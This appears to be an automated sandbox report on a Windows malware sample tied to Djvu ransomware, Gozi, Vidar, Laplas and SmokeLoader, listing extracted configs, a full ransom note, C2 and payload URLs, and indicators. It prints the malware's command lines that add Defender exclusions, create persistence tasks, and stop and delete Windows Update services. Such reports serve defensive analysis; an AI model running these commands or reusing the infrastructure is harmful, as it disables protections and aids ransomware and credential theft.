djvu | 6a068bbd97d4db44109198b8797f7cf54186da1a0012a02baa27875dc9d45769

Analysis

max time kernel
111s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
17-02-2023 13:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

189KB
MD5

c50c3c1ddbc6630a65ed07d5dab24047
SHA1

c6309e78ab81ae15ed6200c29ff5307e0e858f25
SHA256

6a068bbd97d4db44109198b8797f7cf54186da1a0012a02baa27875dc9d45769
SHA512

1f0ece63200b2e4c46f5bd401fe6dd8f4aa0e1713bcc1b67261823a3b5b462a1b20979b733d0529cbc8aab67425e7ba0f10e04493f4691c350ee6c5412c36c92
SSDEEP

3072:zj5v0YemC5nmJ/257HeGTzK2Df3mMu9mtn8P4uopqZALa52rMMBMinW5PGGSf:z9vn8NY+d+gKu/OmhnpqZALw2rM85W5y

Score

10^/10

djvu gozi laplas smokeloader vidar 1001 19 backdoor banker clipper discovery evasion isfb persistence ransomware spyware stealer trojan vmprotect

Malware Config

Extracted

Family

djvu

http://bihsy.com/lancer/get.php

Attributes

extension
.hhoo
offline_id
dMMXkgwQTycP13C5xwPbHDSzhx1ZxiPgIMZXewt1
payload_url
http://uaery.top/dl/build2.exe
http://bihsy.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-UQkYLBSiQ4 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0648JOsie

rsa_pubkey.plain

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

1001

https://checklist.skype.com

http://176.10.125.84

http://91.242.219.235

http://79.132.130.73

http://176.10.119.209

http://194.76.225.88

http://79.132.134.158

Attributes

base_path
/microsoft/
build
250256
exe_type
loader
extension
.acx
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

vidar

Version

2.5

Botnet

Attributes

profile_id
19

Extracted

Family

laplas

http://45.159.189.105

Attributes

api_key
ad75d4e2e9636ca662a337b6e798d36159f23acfc89bbe9400d0d451bd8d69fd

Signatures

Detected Djvu ransomware 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2644-148-0x0000000002350000-0x000000000246B000-memory.dmp	family_djvu
behavioral2/memory/3564-153-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3564-149-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3564-154-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3564-158-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3564-214-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/480-227-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/480-229-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/480-234-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/480-272-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Detects Smokeloader packer 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1536-133-0x00000000005B0000-0x00000000005B9000-memory.dmp	family_smokeloader
behavioral2/memory/3164-160-0x00000000007C0000-0x00000000007C9000-memory.dmp	family_smokeloader

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3900 2336 rundll32.exe
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3900	2336	rundll32.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ADCB.exeADCB.exebuild2.exeC01D.exeliyy.exeABB6.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	ADCB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	ADCB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	build2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	C01D.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	liyy.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	ABB6.exe

Executes dropped EXE 18 IoCs

Processes:

ABB6.exeAC72.exeADCB.exeB231.exeADCB.exeB4C2.exeC01D.exeD201.exellpb1133a.exeliyy.exeXandETC.exeliyy.exeADCB.exeADCB.exebuild2.exebuild2.exe3E39.exesvcupdater.exe

pid	process
3400	ABB6.exe
3168	AC72.exe
2644	ADCB.exe
3164	B231.exe
3564	ADCB.exe
3420	B4C2.exe
372	C01D.exe
1392	D201.exe
4868	llpb1133a.exe
4092	liyy.exe
2752	XandETC.exe
912	liyy.exe
224	ADCB.exe
480	ADCB.exe
3712	build2.exe
1768	build2.exe
4352	3E39.exe
384	svcupdater.exe

Loads dropped DLL 3 IoCs

Processes:

rundll32.exebuild2.exe

pid process

3760 rundll32.exe
1768 build2.exe
1768 build2.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

1844 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3760	rundll32.exe
1768	build2.exe
1768	build2.exe

pid	process
1844	icacls.exe

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe	vmprotect
behavioral2/memory/4868-184-0x0000000140000000-0x000000014061E000-memory.dmp	vmprotect

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ADCB.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\e48e4a34-7f98-440a-b754-89e0be4363ce\\ADCB.exe\" --AutoStart"	ADCB.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

75 api.2ip.ua
76 api.2ip.ua
92 api.2ip.ua

flow	ioc
75	api.2ip.ua
76	api.2ip.ua
92	api.2ip.ua

Suspicious use of SetThreadContext 3 IoCs

Processes:

ADCB.exeADCB.exebuild2.exe

description	pid	process	target process
PID 2644 set thread context of 3564	2644	ADCB.exe	ADCB.exe
PID 224 set thread context of 480	224	ADCB.exe	ADCB.exe
PID 3712 set thread context of 1768	3712	build2.exe	build2.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

3456 sc.exe
4908 sc.exe
4036 sc.exe
1368 sc.exe
4828 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
3456	sc.exe
4908	sc.exe
4036	sc.exe
1368	sc.exe
4828	sc.exe

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4708	3420	WerFault.exe	B4C2.exe
3968	1392	WerFault.exe	D201.exe
4356	3400	WerFault.exe	ABB6.exe
3020	3760	WerFault.exe	rundll32.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

file.exeB231.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	file.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	file.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	B231.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	B231.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	B231.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

build2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1580 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3104 timeout.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 89 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
1580	schtasks.exe

pid	process
3104	timeout.exe

description	flow	ioc
HTTP User-Agent header	89	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exe

pid	process
1536	file.exe
1536	file.exe
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572
2572

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2572
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

file.exeB231.exe

pid process

1536 file.exe
3164 B231.exe

pid	process
2572

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeShutdownPrivilege	2572
Token: SeCreatePagefilePrivilege	2572
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeShutdownPrivilege	4384	powercfg.exe
Token: SeCreatePagefilePrivilege	4384	powercfg.exe
Token: SeShutdownPrivilege	1580	powercfg.exe
Token: SeCreatePagefilePrivilege	1580	powercfg.exe
Token: SeShutdownPrivilege	4888	powercfg.exe
Token: SeCreatePagefilePrivilege	4888	powercfg.exe
Token: SeShutdownPrivilege	3672	powercfg.exe
Token: SeCreatePagefilePrivilege	3672	powercfg.exe
Token: SeIncreaseQuotaPrivilege	5036	powershell.exe
Token: SeSecurityPrivilege	5036	powershell.exe
Token: SeTakeOwnershipPrivilege	5036	powershell.exe
Token: SeLoadDriverPrivilege	5036	powershell.exe
Token: SeSystemProfilePrivilege	5036	powershell.exe
Token: SeSystemtimePrivilege	5036	powershell.exe
Token: SeProfSingleProcessPrivilege	5036	powershell.exe
Token: SeIncBasePriorityPrivilege	5036	powershell.exe
Token: SeCreatePagefilePrivilege	5036	powershell.exe
Token: SeBackupPrivilege	5036	powershell.exe
Token: SeRestorePrivilege	5036	powershell.exe
Token: SeShutdownPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeSystemEnvironmentPrivilege	5036	powershell.exe
Token: SeRemoteShutdownPrivilege	5036	powershell.exe
Token: SeUndockPrivilege	5036	powershell.exe
Token: SeManageVolumePrivilege	5036	powershell.exe
Token: 33	5036	powershell.exe
Token: 34	5036	powershell.exe
Token: 35	5036	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

liyy.exeliyy.exe

pid process

4092 liyy.exe
4092 liyy.exe
912 liyy.exe
912 liyy.exe

pid	process
4092	liyy.exe
4092	liyy.exe
912	liyy.exe
912	liyy.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ADCB.exeADCB.exeC01D.exeliyy.exeABB6.exerundll32.exeADCB.exeADCB.exe

description	pid	process	target process
PID 2572 wrote to memory of 3400	2572		ABB6.exe
PID 2572 wrote to memory of 3400	2572		ABB6.exe
PID 2572 wrote to memory of 3400	2572		ABB6.exe
PID 2572 wrote to memory of 3168	2572		AC72.exe
PID 2572 wrote to memory of 3168	2572		AC72.exe
PID 2572 wrote to memory of 3168	2572		AC72.exe
PID 2572 wrote to memory of 2644	2572		ADCB.exe
PID 2572 wrote to memory of 2644	2572		ADCB.exe
PID 2572 wrote to memory of 2644	2572		ADCB.exe
PID 2644 wrote to memory of 3564	2644	ADCB.exe	ADCB.exe
PID 2644 wrote to memory of 3564	2644	ADCB.exe	ADCB.exe
PID 2644 wrote to memory of 3564	2644	ADCB.exe	ADCB.exe
PID 2572 wrote to memory of 3164	2572		B231.exe
PID 2572 wrote to memory of 3164	2572		B231.exe
PID 2572 wrote to memory of 3164	2572		B231.exe
PID 2644 wrote to memory of 3564	2644	ADCB.exe	ADCB.exe
PID 2644 wrote to memory of 3564	2644	ADCB.exe	ADCB.exe
PID 2644 wrote to memory of 3564	2644	ADCB.exe	ADCB.exe
PID 2644 wrote to memory of 3564	2644	ADCB.exe	ADCB.exe
PID 2644 wrote to memory of 3564	2644	ADCB.exe	ADCB.exe
PID 2644 wrote to memory of 3564	2644	ADCB.exe	ADCB.exe
PID 2644 wrote to memory of 3564	2644	ADCB.exe	ADCB.exe
PID 2572 wrote to memory of 3420	2572		B4C2.exe
PID 2572 wrote to memory of 3420	2572		B4C2.exe
PID 2572 wrote to memory of 3420	2572		B4C2.exe
PID 2572 wrote to memory of 372	2572		C01D.exe
PID 2572 wrote to memory of 372	2572		C01D.exe
PID 2572 wrote to memory of 372	2572		C01D.exe
PID 3564 wrote to memory of 1844	3564	ADCB.exe	icacls.exe
PID 3564 wrote to memory of 1844	3564	ADCB.exe	icacls.exe
PID 3564 wrote to memory of 1844	3564	ADCB.exe	icacls.exe
PID 2572 wrote to memory of 1392	2572		D201.exe
PID 2572 wrote to memory of 1392	2572		D201.exe
PID 2572 wrote to memory of 1392	2572		D201.exe
PID 372 wrote to memory of 4868	372	C01D.exe	llpb1133a.exe
PID 372 wrote to memory of 4868	372	C01D.exe	llpb1133a.exe
PID 372 wrote to memory of 4092	372	C01D.exe	liyy.exe
PID 372 wrote to memory of 4092	372	C01D.exe	liyy.exe
PID 372 wrote to memory of 4092	372	C01D.exe	liyy.exe
PID 372 wrote to memory of 2752	372	C01D.exe	XandETC.exe
PID 372 wrote to memory of 2752	372	C01D.exe	XandETC.exe
PID 4092 wrote to memory of 912	4092	liyy.exe	liyy.exe
PID 4092 wrote to memory of 912	4092	liyy.exe	liyy.exe
PID 4092 wrote to memory of 912	4092	liyy.exe	liyy.exe
PID 3400 wrote to memory of 1580	3400	ABB6.exe	schtasks.exe
PID 3400 wrote to memory of 1580	3400	ABB6.exe	schtasks.exe
PID 3400 wrote to memory of 1580	3400	ABB6.exe	schtasks.exe
PID 3564 wrote to memory of 224	3564	ADCB.exe	ADCB.exe
PID 3564 wrote to memory of 224	3564	ADCB.exe	ADCB.exe
PID 3564 wrote to memory of 224	3564	ADCB.exe	ADCB.exe
PID 3900 wrote to memory of 3760	3900	rundll32.exe	rundll32.exe
PID 3900 wrote to memory of 3760	3900	rundll32.exe	rundll32.exe
PID 3900 wrote to memory of 3760	3900	rundll32.exe	rundll32.exe
PID 224 wrote to memory of 480	224	ADCB.exe	ADCB.exe
PID 224 wrote to memory of 480	224	ADCB.exe	ADCB.exe
PID 224 wrote to memory of 480	224	ADCB.exe	ADCB.exe
PID 224 wrote to memory of 480	224	ADCB.exe	ADCB.exe
PID 224 wrote to memory of 480	224	ADCB.exe	ADCB.exe
PID 224 wrote to memory of 480	224	ADCB.exe	ADCB.exe
PID 224 wrote to memory of 480	224	ADCB.exe	ADCB.exe
PID 224 wrote to memory of 480	224	ADCB.exe	ADCB.exe
PID 224 wrote to memory of 480	224	ADCB.exe	ADCB.exe
PID 224 wrote to memory of 480	224	ADCB.exe	ADCB.exe
PID 480 wrote to memory of 3712	480	ADCB.exe	build2.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1536

C:\Users\Admin\AppData\Local\Temp\ABB6.exe
C:\Users\Admin\AppData\Local\Temp\ABB6.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3400

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
2⤵
- Creates scheduled task(s)
PID:1580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 1032
2⤵
- Program crash
PID:4356

C:\Users\Admin\AppData\Local\Temp\AC72.exe
C:\Users\Admin\AppData\Local\Temp\AC72.exe
1⤵
- Executes dropped EXE
PID:3168

C:\Users\Admin\AppData\Local\Temp\ADCB.exe
C:\Users\Admin\AppData\Local\Temp\ADCB.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2644

C:\Users\Admin\AppData\Local\Temp\ADCB.exe
C:\Users\Admin\AppData\Local\Temp\ADCB.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3564

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\e48e4a34-7f98-440a-b754-89e0be4363ce" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:1844

C:\Users\Admin\AppData\Local\Temp\ADCB.exe
"C:\Users\Admin\AppData\Local\Temp\ADCB.exe" --Admin IsNotAutoStart IsNotTask
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:224

C:\Users\Admin\AppData\Local\Temp\ADCB.exe
"C:\Users\Admin\AppData\Local\Temp\ADCB.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:480

C:\Users\Admin\AppData\Local\0cc92143-b526-4643-8ea1-4a756ad96577\build2.exe
"C:\Users\Admin\AppData\Local\0cc92143-b526-4643-8ea1-4a756ad96577\build2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3712

C:\Users\Admin\AppData\Local\0cc92143-b526-4643-8ea1-4a756ad96577\build2.exe
"C:\Users\Admin\AppData\Local\0cc92143-b526-4643-8ea1-4a756ad96577\build2.exe"
6⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\0cc92143-b526-4643-8ea1-4a756ad96577\build2.exe" & exit
7⤵
PID:5004

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:3104

C:\Users\Admin\AppData\Local\Temp\B231.exe
C:\Users\Admin\AppData\Local\Temp\B231.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3164

C:\Users\Admin\AppData\Local\Temp\B4C2.exe
C:\Users\Admin\AppData\Local\Temp\B4C2.exe
1⤵
- Executes dropped EXE
PID:3420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 448
2⤵
- Program crash
PID:4708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3420 -ip 3420
1⤵
PID:4812

C:\Users\Admin\AppData\Local\Temp\C01D.exe
C:\Users\Admin\AppData\Local\Temp\C01D.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:372

C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe
"C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe"
2⤵
- Executes dropped EXE
PID:4868

C:\Users\Admin\AppData\Local\Temp\liyy.exe
"C:\Users\Admin\AppData\Local\Temp\liyy.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4092

C:\Users\Admin\AppData\Local\Temp\liyy.exe
"C:\Users\Admin\AppData\Local\Temp\liyy.exe" -h
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:912

C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
2⤵
- Executes dropped EXE
PID:2752

C:\Users\Admin\AppData\Local\Temp\D201.exe
C:\Users\Admin\AppData\Local\Temp\D201.exe
1⤵
- Executes dropped EXE
PID:1392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 820
2⤵
- Program crash
PID:3968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1392 -ip 1392
1⤵
PID:4288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3400 -ip 3400
1⤵
PID:5060

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3900

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
- Loads dropped DLL
PID:3760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 604
3⤵
- Program crash
PID:3020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3760 -ip 3760
1⤵
PID:3476

C:\Users\Admin\AppData\Local\Temp\3E39.exe
C:\Users\Admin\AppData\Local\Temp\3E39.exe
1⤵
- Executes dropped EXE
PID:4352

C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
1⤵
- Executes dropped EXE
PID:384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4200

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4384

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4888

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3672

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:2712

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:3456

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:4908

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:4036

